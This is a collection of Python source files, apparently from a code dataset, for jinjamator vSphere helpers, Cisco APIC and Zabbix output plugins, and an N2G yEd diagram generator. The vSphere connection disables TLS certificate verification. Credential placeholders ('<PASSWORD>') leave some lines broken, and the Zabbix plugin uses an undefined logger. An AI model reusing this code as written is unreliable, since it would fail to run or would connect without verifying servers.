re_table = TextFSM(StringIO(dynamic_fsm_template))
retval = []
for row in re_table.ParseText(raw_data):
tmp = {}
for i, v in enumerate(re_table.header):
tmp[v] = row[i]
retval.append(tmp)
return retval
```
#### File: vsphere/hosts/portgroups.py
```python
import re
def list(hosts=None):
if hosts == None:
hosts = vmware.vsphere.hosts.list()
retval = {}
for host in hosts:
pg = host.config.network.portgroup
retval[host] = pg
return retval
def find(search, return_type="obj", hosts=None):
rgx = re.compile(search)
retval = {}
for host, obj in list(hosts).items():
retval[host] = []
for pg in obj:
if rgx.search(str(pg.key)):
log.debug(f"found portgroup key: {pg.key}")
if return_type == "name":
retval[host].append(pg.key.replace("key-vim.host.PortGroup-", ""))
elif return_type == "obj":
retval[host].append(pg)
else:
retval[host].append(pg)
return retval
```
#### File: vmware/vsphere/__init__.py
```python
from pyVim.connect import SmartConnect, SmartConnectNoSSL, Disconnect
from pyVmomi import vim
vsphere_connection_pool = {}
def get_content(service_instance=None, cache=True):
if cache:
_cfg = _jinjamator.configuration
if vsphere_connection_pool.get(_cfg["vsphere_host"]):
if (
vsphere_connection_pool[_cfg["vsphere_host"]]
.get(_cfg["vsphere_username"], {})
.get("content")
):
log.debug("Using cached content")
return (
vsphere_connection_pool[_cfg["vsphere_host"]]
.get(_cfg["vsphere_username"], {})
.get("content")
)
if not service_instance:
service_instance = connect()
content = service_instance.RetrieveContent()
if cache:
vsphere_connection_pool[_cfg["vsphere_host"]][_cfg["vsphere_username"]][
"content"
] = content
return content
def get_obj(vimtype, name, content=None):
if not content:
content = get_content()
obj = None
container = content.viewManager.CreateContainerView(
content.rootFolder, vimtype, True
)
for c in container.view:
if c.name == name:
obj = c
break
return obj
def connect(host=None, username=None, password=<PASSWORD>, cache=True):
_cfg = _jinjamator.configuration
for param in ["vsphere_host", "vsphere_username", "vsphere_password"]:
if locals().get(param):
_cfg[param] = locals()[param]
if not _cfg[param]:
_jinjamator.handle_undefined_var(param)
if cache:
if vsphere_connection_pool.get(_cfg["vsphere_host"]):
if vsphere_connection_pool[_cfg["vsphere_host"]].get(
_cfg["vsphere_username"]
):
log.debug(
f'Using cached connection to VSphere host {_cfg["vsphere_host"]}'
)
return vsphere_connection_pool[_cfg["vsphere_host"]][
_cfg["vsphere_username"]
]["service_instance"]
service_instance = SmartConnectNoSSL(
host=_cfg["vsphere_host"],
user=_cfg["vsphere_username"],
pwd=_cfg["<PASSWORD>"],
port=443,
)
if service_instance:
log.debug(f"Connected VSphere host {_cfg['vsphere_host']}")
else:
raise Exception(f"Cannot connect VSphere host {_cfg['vsphere_host']}")
if cache:
vsphere_connection_pool[_cfg["vsphere_host"]] = {
_cfg["vsphere_username"]: {"service_instance": service_instance}
}
return service_instance
```
#### File: vsphere/vms/__init__.py
```python
from pyVmomi import vim
import re
def list(content=None):
if not content:
content = vmware.vsphere.get_content()
vm_view = content.viewManager.CreateContainerView(
content.rootFolder, [vim.VirtualMachine], True
)
obj = [vm for vm in vm_view.view]
vm_view.Destroy()
return obj
def list_names(content=None):
return [vm.name for vm in list(content)]
def find(search, return_type="obj", service_instance_content=None):
if not search:
return list()
rgx = re.compile(search)
retval = []
for obj in list():
if rgx.search(str(obj.name)):
if return_type == "name":
retval.append(obj.name)
elif return_type == "obj":
retval.append(obj)
else:
retval.append(obj)
return retval
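# Usage sketch (illustrative, assumes execution inside a jinjamator tasklet where
# the vmware plugin namespace and logger are injected into globals, as the
# un-imported references above suggest):
#
#   web_vms = vmware.vsphere.vms.find(r"^web-\d+$", return_type="name")
#   log.info("matched VMs: {}".format(web_vms))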
```
#### File: output/apic/__init__.py
```python
import sys
import os
from jinjamator.tools.output_plugin_base import outputPluginBase, processError
from jinjamator.external.acitoolkit.acisession import Session
import getpass
from pprint import pformat
import json
from collections import defaultdict
import re
from pprint import pprint, pformat
import logging
def tree():
return defaultdict(tree)
class apic(outputPluginBase):
def __init__(self, parent):
self._log = logging.getLogger()
self._parent = parent
self.apic_dn_acl_rules = [
"uni/tn-\S+/ctx-.*,c,protect VRFs from deletion and configuration updates",
"uni/tn-[a-zA-Z0-9]+$,c,protect Tenant objects from deletion",
]
self._dn_acls = {}
self.apic_password = ""
self.apic_username = ""
self.apic_key = ""
self.apic_cert_name = ""
self.apic_url = ""
self.apic_session = None
def addArguments(self):
self._parent._parser.add_argument(
"-l",
"--apic-username",
dest="apic_username",
help="apic username [default: %(default)s]",
default="admin",
)
self._parent._parser.add_argument(
"-p",
"--apic-password",
dest="apic_password",
help="apic password",
default="",
)
self._parent._parser.add_argument(
"-u", "--apic-url", dest="apic_url", help="apic URL", default=""
)
self._parent._parser.add_argument(
"-k",
"--apic-key",
dest="apic_key",
help="path to apic user private key",
default="",
)
self._parent._parser.add_argument(
"--apic-certname",
dest="apic_cert_name",
help="path to apic user certificate",
default="",
)
self._parent._parser.add_argument(
"--apic-set-dn-acl-rule",
action="append",
dest="apic_dn_acl_rules",
help="format: <dn path regex>,<c(eate)|u(pdate)|d(delete)>,<remark> default: %(default)s",
default=self.apic_dn_acl_rules,
)
def init_plugin_params(self, **kwargs):
self._dn_acls = {}
for var in [
"apic_username",
"apic_url",
"apic_password",
"apic_key",
"apic_cert_name",
"apic_dn_acl_rules",
]:
if self._parent.configuration._data.get(var):
setattr(self, var, self._parent.configuration._data.get(var, ""))
@staticmethod
def get_json_schema(configuration={}):
# form = {
# "data": {
# "apic_cert_name": configuration.get("apic_cert_name", "")
# },
# "schema": {
# "type": "object",
# "title": "APIC Output Plugin Parameters",
# "properties": {
# "apic_cert_name": {
# "title": "Cert Name",
# "type": "string",
# "description": "Name of the APIC user certificate",
# }
# },
# },
# "options": {
# "fields": {
# "apic_cert_name": {
# "helper": [
# "Name of the APIC user certificate"
# ]
# }
# }
# },
# }
# return dict(form)
form = tree()
form["schema"]["type"] = "object"
form["schema"]["properties"]["apic_cert_name"]["title"] = "Cert Name"
form["schema"]["properties"]["apic_cert_name"]["type"] = "string"
form["schema"]["properties"]["apic_cert_name"][
"description"
] = "Name of the APIC user certificate"
form["schema"]["properties"]["apic_cert_name"]["default"] = configuration.get(
"apic_cert_name", ""
)
form["schema"]["properties"]["apic_key"]["title"] = "Key Path"
form["schema"]["properties"]["apic_key"]["type"] = "string"
form["schema"]["properties"]["apic_key"][
"description"
] = "Server side path to encryption key for cert authentication (overrides password)"
form["schema"]["properties"]["apic_key"]["default"] = configuration.get(
"apic_key", ""
)
form["schema"]["properties"]["apic_password"]["title"] = "Password"
form["schema"]["properties"]["apic_password"]["type"] = "string"
form["schema"]["properties"]["apic_password"][
"description"
] = "Cisco ACI password"
form["schema"]["properties"]["apic_password"]["format"] = "password"
form["schema"]["properties"]["apic_password"]["default"] = configuration.get(
"apic_password", ""
)
form["schema"]["properties"]["apic_username"]["title"] = "Username"
form["schema"]["properties"]["apic_username"]["type"] = "string"
form["schema"]["properties"]["apic_username"][
"description"
] = "Cisco ACI username"
# form['schema']['properties']['apic_username']['required']=True
form["schema"]["properties"]["apic_username"]["default"] = configuration.get(
"apic_username", "admin"
)
form["schema"]["properties"]["apic_url"]["title"] = "APIC URL"
form["schema"]["properties"]["apic_url"]["type"] = "string"
form["schema"]["properties"]["apic_url"][
"description"
] = "URL of Cisco ACI Controller"
# form['schema']['properties']['apic_url']['required']=True
# form["schema"]["properties"]["apic_url"]["default"] = configuration.get(
# "apic_url", "https://"
# )
form["schema"]["properties"]["apic_url"][
"pattern"
] = "^(https?:\\/\\/)\
((([a-z\\d]([a-z\\d-]*[a-z\\d])*)\\.?)+[a-z]*|\
((\\d{1,3}\\.){3}\\d{1,3}))\
(\\:\\d+)?(\\/[-a-z\\d%_.~+]*)*\
(\\?[;&a-z\\d%_.~+=-]*)?\
(\\#[-a-z\\d_]*)?$"
form["schema"]["properties"]["apic_url"]["default"] = configuration.get(
"apic_url", ""
)
form["options"]["fields"]["apic_url"]["order"] = 1
# form["options"]['fields']['apic_url']['hideInitValidationError']= True
form["options"]["fields"]["apic_username"]["order"] = 2
form["options"]["fields"]["apic_password"]["order"] = 3
form["options"]["fields"]["apic_key"]["order"] = 4
form["options"]["fields"]["apic_cert_name"]["order"] = 5
return dict(form)
def connect(self, **kwargs):
self.init_plugin_params()
self.init_acls()
if self.apic_key and self.apic_cert_name:
self.apic_session = Session(
self.apic_url,
self.apic_username,
cert_name=self.apic_cert_name,
key=self.apic_key,
subscription_enabled=False,
)
else:
if not self.apic_password:
self.apic_password = self._parent.handle_undefined_var("apic_password")
self.apic_session = Session(
self.apic_url,
self.apic_username,
self.apic_password,
subscription_enabled=False,
)
self.apic_session.login()
def init_acls(self):
for apic_dn_acl_rule in self.apic_dn_acl_rules:
if isinstance(apic_dn_acl_rule, str):
dn_regex, flags, remark = apic_dn_acl_rule.split(",")
self._dn_acls[dn_regex] = {
"rgx": re.compile(dn_regex),
"acls": {
"create": True if "c" in flags else False,
"read": True,
"update": True if "u" in flags else False,
"delete": True if "d" in flags else False,
},
"remark": remark,
}
elif isinstance(apic_dn_acl_rule, dict):
self._dn_acls[apic_dn_acl_rule["regex"]] = {
"rgx": re.compile(apic_dn_acl_rule["regex"]),
"acls": {
"create": True
if "create" in apic_dn_acl_rule["acls"]
else False,
"read": True,
"update": True
if "update" in apic_dn_acl_rule["acls"]
else False,
"delete": True
if "delete" in apic_dn_acl_rule["acls"]
else False,
},
"remark": apic_dn_acl_rule.get("remark", ""),
}
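# Example (illustrative): the default rule string
#   "uni/tn-[a-zA-Z0-9]+$,c,protect Tenant objects from deletion"
# is parsed into regex "uni/tn-[a-zA-Z0-9]+$", flags "c" and the trailing remark,
# i.e. matching tenant DNs may be created (and read) but not updated or deleted.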
def check_acl(self, item):
obj_type = list(item.keys())[0]
attributes = item[obj_type]["attributes"]
for acl_string, acl in self._dn_acls.items():
if acl["rgx"].match(attributes["dn"]):
if (
attributes.get("status", "create") == "deleted"
and not acl["acls"]["delete"]
):
raise Exception(
"cannot delete dn {}, as it is forbidden by acl {}".format(
attributes["dn"], acl_string
)
)
elif acl["acls"]["create"] and acl["acls"]["update"]:
return True
existing_data = json.loads(
self.apic_session.get(
"/api/node/mo/{0}.json".format(attributes["dn"])
).text
)
if len(existing_data["imdata"]) > 0 and acl["acls"]["update"]:
return True
elif len(existing_data["imdata"]) == 0 and acl["acls"]["create"]:
return True
else:
raise Exception(
"cannot create or update dn {}, as it is forbidden by acl {} {}".format(
attributes["dn"], acl_string, pformat(acl["acls"])
)
)
else:
self._log.debug(
"no acl match acl {} dn {}".format(acl_string, attributes["dn"])
)
def process(self, data, **kwargs):
try:
if data in [None, "None", ""]:
self._log.debug("empty document -> nothing to do -> skipping")
return True
data = json.loads(data)
self._log.debug(json.dumps(data, indent=2))
except ValueError as e:
self._log.error(
"{0}\nis not a valid json document {1} -> invalid configuration -> skipping".format(
data, e
)
)
return False
except TypeError:
pass
for item in data["imdata"]:
try:
dn = item[list(item.keys())[0]]["attributes"]["dn"]
self.check_acl(item)
except IndexError:
continue
resp = self.apic_session.push_to_apic(
"/api/node/mo/{0}.json".format(dn), item, timeout=None
)
if not resp.ok:
self._log.error("POST request failed: {0}".format(pformat(resp.text)))
self._log.debug(pformat(item))
if "best_effort" in self._parent.configuration._data.keys():
return True
raise processError
else:
self._log.info("successfully sent config for dn {0}".format(dn))
self._log.debug(json.dumps(item, indent=2))
return True
``` |
{
"source": "jinjamator/jinjamator-plugin-output-zabbix",
"score": 2
} |
#### File: output/zabbix/__init__.py
```python
import sys
import os
from jinjamator.tools.output_plugin_base import outputPluginBase, processError
from pprint import pformat
import json
from collections import defaultdict
import re
from pprint import pprint, pformat
import logging
from pyzabbix import ZabbixMetric, ZabbixSender
def tree():
return defaultdict(tree)
class zabbix(outputPluginBase):
def __init__(self, parent):
self._log = logging.getLogger()
self._parent = parent
def addArguments(self):
self._parent._parser.add_argument(
"--zabbix-server",
dest="zabbix_server",
help="Zabbix server hostname or IP [default: %(default)s]",
default="127.0.0.1",
)
self._parent._parser.add_argument(
"--zabbix-server-port",
dest="zabbix_port",
help="Zabbix server port [default: %(default)s]",
default=10051,
)
self._parent._parser.add_argument(
"--zabbix-host",
dest="zabbix_host",
help="Hostname as it displayed in Zabbix [default: %(default)s]",
default="",
)
def init_plugin_params(self, **kwargs):
for var in ["zabbix_server", "zabbix_port", "zabbix_host"]:
if self._parent.configuration._data.get(var):
setattr(self, var, self._parent.configuration._data.get(var, ""))
@staticmethod
def get_json_schema(configuration={}):
form = tree()
form["schema"]["type"] = "object"
form["schema"]["properties"]["zabbix_server"]["title"] = "Zabbix Server"
form["schema"]["properties"]["zabbix_server"]["type"] = "string"
form["schema"]["properties"]["zabbix_server"][
"description"
] = "Zabbix server hostname or IP"
form["schema"]["properties"]["zabbix_port"]["title"] = "Port"
form["schema"]["properties"]["zabbix_port"]["type"] = "integer"
form["schema"]["properties"]["zabbix_port"][
"description"
] = "Zabbix server port"
form["schema"]["properties"]["zabbix_port"]["default"] = configuration.get(
"zabbix_port", 10051
)
form["schema"]["properties"]["zabbix_host"]["title"] = "Zabbix Hostname"
form["schema"]["properties"]["zabbix_host"]["type"] = "string"
form["schema"]["properties"]["zabbix_host"][
"description"
] = "Hostname as it displayed in Zabbix"
form["schema"]["properties"]["zabbix_host"]["default"] = configuration.get(
"zabbix_host", ""
)
form["options"]["fields"]["zabbix_server"]["order"] = 1
form["options"]["fields"]["zabbix_port"]["order"] = 2
form["options"]["fields"]["zabbix_host"]["order"] = 3
return dict(form)
def connect(self, **kwargs):
self.init_plugin_params()
self.zbx = ZabbixSender(
self._parent.configuration._data.get("zabbix_server"),
self._parent.configuration._data.get("zabbix_port"),
)
def process(self, data, **kwargs):
try:
if data in [None, "None", ""]:
self._log.debug("empty document -> nothing to do -> skipping")
return True
data = json.loads(data)
self._log.debug(json.dumps(data, indent=2))
except ValueError as e:
self._log.error(
"{0}\nis not a valid json document {1} -> invalid configuration -> skipping".format(
data, e
)
)
return False
except TypeError:
pass
metrics = []
for row in data:
target_hostname = row.get(
"hostname", self._parent.configuration._data.get("zabbix_host", None)
)
if target_hostname:
for k, v in row.items():
if k not in ["hostname"]:
m = ZabbixMetric(target_hostname, k, v)
metrics.append(m)
else:
log.error("Target Hostname not defined -> skipping")
log.debug(row)
self.zbx.send(metrics)
return True
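# Example input (illustrative item keys): process() expects a JSON list of rows
# where "hostname" selects the Zabbix host and every other key/value pair is sent
# as a ZabbixMetric, e.g.:
#   [{"hostname": "core-sw1", "icmp.rtt": 0.4, "uptime": 86400}]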
``` |
{
"source": "jinjamator/N2G",
"score": 3
} |
#### File: N2G/N2G/N2G_yEd.py
```python
import xml.etree.ElementTree as ET
import hashlib
import os
from json import dumps as json_dumps # need it to dump metadata for edges/nodes
from json import loads as json_loads # need it to load metadata for edges/nodes
import logging
# initiate logging
log = logging.getLogger(__name__)
LOG_LEVEL = "ERROR"
LOG_FILE = None
def logging_config(LOG_LEVEL, LOG_FILE):
valid_log_levels = ["DEBUG", "INFO", "WARNING", "ERROR", "CRITICAL"]
if LOG_LEVEL.upper() in valid_log_levels:
logging.basicConfig(
format="%(asctime)s.%(msecs)d [N2G_YED %(levelname)s] %(lineno)d; %(message)s",
datefmt="%m/%d/%Y %I:%M:%S",
level=LOG_LEVEL.upper(),
filename=LOG_FILE,
filemode="w",
)
logging_config(LOG_LEVEL, LOG_FILE)
class yed_diagram:
"""
N2G yEd module allows producing diagrams in yEd .graphml format.
**Parameters**
* ``node_duplicates`` (str) can be of value skip, log, update
* ``link_duplicates`` (str) can be of value skip, log, update
"""
# XML string templates to create lxml etree elements from:
graph_xml = """<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<graphml xmlns="http://graphml.graphdrawing.org/xmlns" xmlns:java="http://www.yworks.com/xml/yfiles-common/1.0/java" xmlns:sys="http://www.yworks.com/xml/yfiles-common/markup/primitives/2.0" xmlns:x="http://www.yworks.com/xml/yfiles-common/markup/2.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:y="http://www.yworks.com/xml/graphml" xmlns:yed="http://www.yworks.com/xml/yed/3" xsi:schemaLocation="http://graphml.graphdrawing.org/xmlns http://www.yworks.com/xml/schema/graphml/1.1/ygraphml.xsd">
<!--Created by yEd 3.17.2-->
<key attr.name="Description" attr.type="string" for="graph" id="d0"/>
<key for="port" id="d1" yfiles.type="portgraphics"/>
<key for="port" id="d2" yfiles.type="portgeometry"/>
<key for="port" id="d3" yfiles.type="portuserdata"/>
<key attr.name="url" attr.type="string" for="node" id="d4"/>
<key attr.name="description" attr.type="string" for="node" id="d5"/>
<key for="node" id="d6" yfiles.type="nodegraphics"/>
<key for="graphml" id="d7" yfiles.type="resources"/>
<key attr.name="url" attr.type="string" for="edge" id="d8"/>
<key attr.name="description" attr.type="string" for="edge" id="d9"/>
<key for="edge" id="d10" yfiles.type="edgegraphics"/>
<key attr.name="nmetadata" attr.type="string" for="node" id="d11">
<default/>
</key>
<key attr.name="emetadata" attr.type="string" for="edge" id="d12">
<default/>
</key>
<key attr.name="gmetadata" attr.type="string" for="graph" id="d13">
<default/>
</key>
<graph edgedefault="directed" id="G">
</graph>
<data key="d7">
<y:Resources>
</y:Resources>
</data>
</graphml>
"""
shape_node_xml = """
<node id="{id}" xmlns:y="http://www.yworks.com/xml/graphml" xmlns="http://graphml.graphdrawing.org/xmlns">
<data key="{attrib_id}">
<y:ShapeNode>
<y:Geometry height="{height}" width="{width}" x="{x}" y="{y}"/>
<y:Fill color="#FFFFFF" transparent="false"/>
<y:BorderStyle color="#000000" raised="false" type="line" width="3.0"/>
<y:Shape type="{shape_type}"/>
</y:ShapeNode>
</data>
</node>
"""
svg_node_xml = """
<node id="{id}" xmlns:y="http://www.yworks.com/xml/graphml" xmlns="http://graphml.graphdrawing.org/xmlns">
<data key="{attrib_id}">
<y:SVGNode>
<y:Geometry width="{width}" height="{height}" x="{x}" y="{y}"/>
<y:Fill color="#CCCCFF" transparent="false"/>
<y:BorderStyle color="#000000" type="line" width="1.0"/>
<y:SVGNodeProperties usingVisualBounds="true"/>
<y:SVGModel svgBoundsPolicy="0">
<y:SVGContent refid="{refid}"/>
</y:SVGModel>
</y:SVGNode>
</data>
</node>
"""
group_node_xml = """
<node xmlns:y="http://www.yworks.com/xml/graphml" xmlns="http://graphml.graphdrawing.org/xmlns" id="nNodeID" yfiles.foldertype="group">
<data key="{attrib_id}">
<y:ProxyAutoBoundsNode>
<y:Realizers active="0">
<y:GroupNode>
<y:Geometry height="50.0" width="50.0" x="0.0" y="0.0"/>
<y:Fill color="#FFFFFF" color2="#FFFFFF" transparent="false"/>
<y:BorderStyle color="#000000" type="line" width="1.0"/>
<y:Shape type="rectangle"/>
<y:State closed="false" closedHeight="50.0" closedWidth="157.0" innerGraphDisplayEnabled="true"/>
<y:Insets bottom="5" bottomF="5.0" left="5" leftF="5.0" right="5" rightF="5.0" top="5" topF="5.0"/>
<y:BorderInsets bottom="0" bottomF="0.0" left="31" leftF="31.0" right="0" rightF="0.0" top="0" topF="0.0"/>
</y:GroupNode>
</y:Realizers>
</y:ProxyAutoBoundsNode>
</data>
<graph edgedefault="directed" id="nNodeID:">
</graph>
</node>
"""
edge_xml = """
<edge xmlns:y="http://www.yworks.com/xml/graphml" xmlns="http://graphml.graphdrawing.org/xmlns" id="{id}" source="{source}" target="{target}">
<data key="{attrib_id}">
<y:PolyLineEdge>
<y:LineStyle color="#000000" type="line" width="1.0"/>
<y:Arrows source="none" target="none"/>
<y:BendStyle smoothed="false"/>
</y:PolyLineEdge>
</data>
</edge>
"""
node_label_xml = """
<y:NodeLabel xmlns:y="http://www.yworks.com/xml/graphml" xmlns="http://graphml.graphdrawing.org/xmlns" alignment="center" autoSizePolicy="content" fontFamily="Dialog" fontSize="12" fontStyle="plain" hasBackgroundColor="false" hasLineColor="false" height="18" horizontalTextPosition="center"
iconTextGap="4" modelName="internal" modelPosition="c" textColor="#000000" verticalTextPosition="bottom" visible="true"
width="70"></y:NodeLabel>
"""
edge_label_xml = """
<y:EdgeLabel xmlns:y="http://www.yworks.com/xml/graphml" xmlns="http://graphml.graphdrawing.org/xmlns" alignment="center" backgroundColor="#FFFFFF" configuration="AutoFlippingLabel" distance="2.0" fontFamily="Dialog" fontSize="12" fontStyle="plain" hasLineColor="false" height="18" horizontalTextPosition="center" iconTextGap="4" modelName="free" modelPosition="anywhere" preferredPlacement="target_on_edge" ratio="0.5" textColor="#000000" upX="-1.0" upY="-6E-17" verticalTextPosition="bottom" visible="true" width="32">
EdgeLabel
<y:PreferredPlacementDescriptor angle="0.0" angleOffsetOnRightSide="0" angleReference="relative_to_edge_flow" angleRotationOnRightSide="co" distance="-1.0" placement="center" side="on_edge" sideReference="relative_to_edge_flow"/>
</y:EdgeLabel>
"""
resource_xml = """
<y:Resource id="{id}" xmlns:y="http://www.yworks.com/xml/graphml" xmlns="http://graphml.graphdrawing.org/xmlns">{text_data}
</y:Resource>
"""
namespaces = {
"_default_ns_": "http://graphml.graphdrawing.org/xmlns",
"java": "http://www.yworks.com/xml/yfiles-common/1.0/java",
"sys": "http://www.yworks.com/xml/yfiles-common/markup/primitives/2.0",
"x": "http://www.yworks.com/xml/yfiles-common/markup/2.0",
"xsi": "http://www.w3.org/2001/XMLSchema-instance",
"y": "http://www.yworks.com/xml/graphml",
"yed": "http://www.yworks.com/xml/yed/3",
}
def __init__(self, node_duplicates="skip", link_duplicates="skip"):
self.drawing = ET.fromstring(self.graph_xml)
self.graph_root = self.drawing.find("./_default_ns_:graph", self.namespaces)
self.y_attr = {}
self.node_duplicates = node_duplicates
self.link_duplicates = link_duplicates
self.edges_ids = {} # dictionary of "edge id hash": "yed generated edge id"
self.nodes_ids = {} # dictionary of "node id": "yed generated node id"
self.svg_pics_dict = {}
self._load_yattrs()
# register name spaces names to dump them properly in XML output
[ET.register_namespace(k, v) for k, v in self.namespaces.items()]
def _load_yattrs(self):
"""
function to load yEd tag attributes and form self.y_attr dict similar to this:
self.y_attr = {'edge': {'description': 'd9',
'edgegraphics': 'd10',
'emetadata': 'd12',
'url': 'd8'},
'graph': {'Description': 'd0', 'gmetadata': 'd13'},
'graphml': {'resources': 'd7'},
'node': {'description': 'd5',
'nmetadata': 'd11',
'nodegraphics': 'd6',
'url': 'd4'},
'port': {'portgeometry': 'd2', 'portgraphics': 'd1', 'portuserdata': 'd3'}}
"""
keys = self.drawing.findall("./_default_ns_:key", self.namespaces)
for key in keys:
if "attr.name" in key.attrib:
attrname = key.attrib["attr.name"]
elif "yfiles.type" in key.attrib:
attrname = key.attrib["yfiles.type"]
self.y_attr.setdefault(key.attrib["for"], {})
self.y_attr[key.attrib["for"]][attrname] = key.attrib["id"]
def _create_label_element(
self,
xml_template, # string, XML label template to create the element from
label="", # string, center label of edge/nodes
path="", # string, xml tree path, if empty, work with element tag
**kwargs # attributes for edge/node label element at "path" tag
):
"""
function to create label elements for appending to edge/node elements
"""
element = ET.fromstring(xml_template)
if label != None:
element.text = label
if path == "":
element.attrib.update(kwargs)
else:
element.find(path, self.namespaces).attrib.update(kwargs)
return element
def _create_data_element(
self,
id, # string, id of data element, e.g. d11, d4, d1 etc.
text, # string, text to add to data element
):
elem = ET.fromstring('<data key="{}"/>'.format(id))
elem.text = text.strip()
return elem
def _node_exists(self, id, **kwargs):
# check if node with given name already exists
if id in self.nodes_ids:
if self.node_duplicates == "log":
log.error("add_shape_node: node '{}' already added to graph".format(id))
elif self.node_duplicates == "skip":
pass
elif self.node_duplicates == "update":
self.update_node(id, **kwargs)
return True
else:
return False
def add_shape_node(
self,
id,
label="",
top_label="",
bottom_label="",
attributes={},
description="",
shape_type="roundrectangle",
url="",
width=120,
height=60,
x_pos=200,
y_pos=150,
**kwargs
):
"""
Method to add node of type "shape".
**Parameters**
* ``id`` (str) mandatory, unique node identifier, usually equal to node name
* ``label`` (str) label at the center of the node, by default equal to id attribute
* ``top_label`` (str) label displayed at the top of the node
* ``bottom_label`` (str) label displayed at the bottom of the node
* ``description`` (str) string to save as node ``description`` attribute
* ``shape_type`` (str) shape type, default - "roundrectangle"
* ``url`` (str) url string to save a node ``url`` attribute
* ``width`` (int) node width in pixels
* ``height`` (int) node height in pixels
* ``x_pos`` (int) node position on x axis
* ``y_pos`` (int) node position on y axis
* ``attributes`` (dict) dictionary of yEd graphml tag names and attributes
Attributes dictionary keys will be used as xml tag names and values
dictionary will be used as xml tag attributes, example::
{
'Shape' : {'type': 'roundrectangle'},
'DropShadow': { 'color': '#B3A691', 'offsetX': '5', 'offsetY': '5'}
}
"""
# check duplicates
if self._node_exists(
id,
label=label,
top_label=top_label,
bottom_label=bottom_label,
attributes=attributes,
description=description,
):
return
self.nodes_ids[id] = id
# create node element:
node = ET.fromstring(
self.shape_node_xml.format(
attrib_id=self.y_attr["node"]["nodegraphics"],
id=id,
shape_type=shape_type,
width=width,
height=height,
x=x_pos,
y=y_pos,
)
)
# add labels
if label == "":
label = id
labels = {"c": label, "t": top_label, "b": bottom_label}
ShapeNode = node.find("./_default_ns_:data/y:ShapeNode", self.namespaces)
for position, label_text in labels.items():
if label_text.strip():
ShapeNode.append(
self._create_label_element(
self.node_label_xml, label_text, modelPosition=position
)
)
# add description data and url
if description != "":
node.append(
self._create_data_element(
id=self.y_attr["node"]["description"], text=description
)
)
if url != "":
node.append(
self._create_data_element(id=self.y_attr["node"]["url"], text=url)
)
# save original node ID in nmetadata attribute - used to load graph from file:
node.append(
self._create_data_element(
id=self.y_attr["node"]["nmetadata"], text=json_dumps({"id": id}),
)
)
# set attributes for the node children:
self.set_attributes(ShapeNode, attributes)
# add node to graph
self.graph_root.append(node)
def add_svg_node(
self,
pic,
id,
pic_path="./Pics/",
label="",
attributes={},
description="",
url="", # string, data to add tonode URL
width=50,
height=50,
x_pos=200,
y_pos=150,
**kwargs
):
"""
Method to add SVG picture as node by loading SVG file content into graphml
**Parameters**
* ``id`` (str) mandatory, unique node identifier, usually equal to node name
* ``pic`` (str) mandatory, name of svg file
* ``pic_path`` (str) OS path to SVG file folder, default is ``./Pics/``
* ``label`` (str) label displayed above SVG node, if not provided, label set equal to id
* ``description`` (str) string to save as node ``description`` attribute
* ``url`` (str) url string to save as node ``url`` attribute
* ``width`` (int) node width in pixels
* ``height`` (int) node height in pixels
* ``x_pos`` (int) node position on x axis
* ``y_pos`` (int) node position on y axis
* ``attributes`` (dict) dictionary of yEd graphml tag names and attributes
Attributes dictionary keys will be used as xml tag names and values
dictionary will be used as xml tag attributes, example::
{
'DropShadow': { 'color': '#B3A691', 'offsetX': '5', 'offsetY': '5'}
}
"""
# check duplicates
if self._node_exists(
id, label=label, attributes=attributes, description=description
):
return
# sanitize pic:
if not pic.endswith(".svg"):
pic += ".svg"
pic_file_path = pic_path + pic
# check if file exists
if not os.path.exists(pic_file_path):
log.error(
"add_svg_node: failed to load svg, '{}' - file not found".format(
pic_file_path
)
)
return
self.nodes_ids[id] = id
# load svg pic resource into graph resources section if not yet loaded:
if not pic_file_path in self.svg_pics_dict:
resource_id = hashlib.md5(pic_file_path.encode()).hexdigest()
with open(pic_file_path, "r") as pic_file:
pic_xml = pic_file.read()
# extract pic width and height that can be contained in viewBox attribute as well:
pic_element = ET.fromstring(pic_xml.encode("utf8"))
if pic_element.attrib.get("viewBox"):
_, _, pic_width, pic_height = pic_element.attrib.get(
"viewBox"
).split(" ")
elif pic_element.find(".//*/{http://www.w3.org/2000/svg}svg"):
_, _, pic_width, pic_height = (
pic_element.find(".//*/{http://www.w3.org/2000/svg}svg")
.attrib.get("viewBox")
.split(" ")
)
else:
pic_width = pic_element.get("width", width)
pic_height = pic_element.get("height", height)
del pic_element
pic_width = float(pic_width)
pic_height = float(pic_height)
# scale width and height down to 100px if size more than 100px
if max(pic_width, pic_height) > 100:
factor = max(pic_width, pic_height) / 100
pic_width = pic_width / factor
pic_height = pic_height / factor
# modify pic_xml for inclusion into resource element
pic_xml = (
pic_xml.replace("&", "&")
.replace("<", "<")
.replace(">", ">")
.replace("'", "'")
)
# save pic id and its params into svg_pics_dict dictionary:
self.svg_pics_dict[pic_file_path] = {
"refid": resource_id,
"height": pic_height,
"width": pic_width,
}
# create resource element:
svg_resource_element = ET.fromstring(
self.resource_xml.format(id=resource_id, text_data=pic_xml)
)
self.drawing.find(
"./_default_ns_:data/y:Resources", self.namespaces
).append(svg_resource_element)
del svg_resource_element
params = self.svg_pics_dict[pic_file_path]
# create svg_node element:
svg_node = ET.fromstring(
self.svg_node_xml.format(
attrib_id=self.y_attr["node"]["nodegraphics"],
id=id,
refid=params["refid"],
height=params["height"],
width=params["width"],
x=x_pos,
y=y_pos,
)
)
# add label and description data to the node:
if label == "":
label = id
svg_node.find("./_default_ns_:data/y:SVGNode", self.namespaces).append(
self._create_label_element(
self.node_label_xml, label, modelName="sandwich", modelPosition="n"
)
)
if description != "":
svg_node.append(
self._create_data_element(
id=self.y_attr["node"]["description"], text=description
)
)
if url != "":
svg_node.append(
self._create_data_element(id=self.y_attr["node"]["url"], text=url)
)
# save original id in node custom attribute:
svg_node.append(
self._create_data_element(
id=self.y_attr["node"]["nmetadata"], text=json_dumps({"id": id})
)
)
# add node to the graph:
self.graph_root.append(svg_node)
def _add_group_node(
self,
id, # string, name of the node
label="", # string, label at the center of the node
top_label="", # string, label at the top of the node
bottom_label="", # string, label at the bottom of the node
attributes={}, # dictionary, contains node attributes
description="", # string, data to add in node description
url="", # string, data to add tonode URL
):
"""
NOT IMPLEMENTED.
Method to add group node to join nodes in cluster.
"""
# check for node duplicates:
if self._node_exists(
id,
label=label,
top_label=top_label,
bottom_label=bottom_label,
attributes=attributes,
description=description,
):
return
self.nodes_ids[id] = id
# create node element:
node = ET.fromstring(
self.group_node_xml.format(attrib_id=self.y_attr["node"]["nodegraphics"])
)
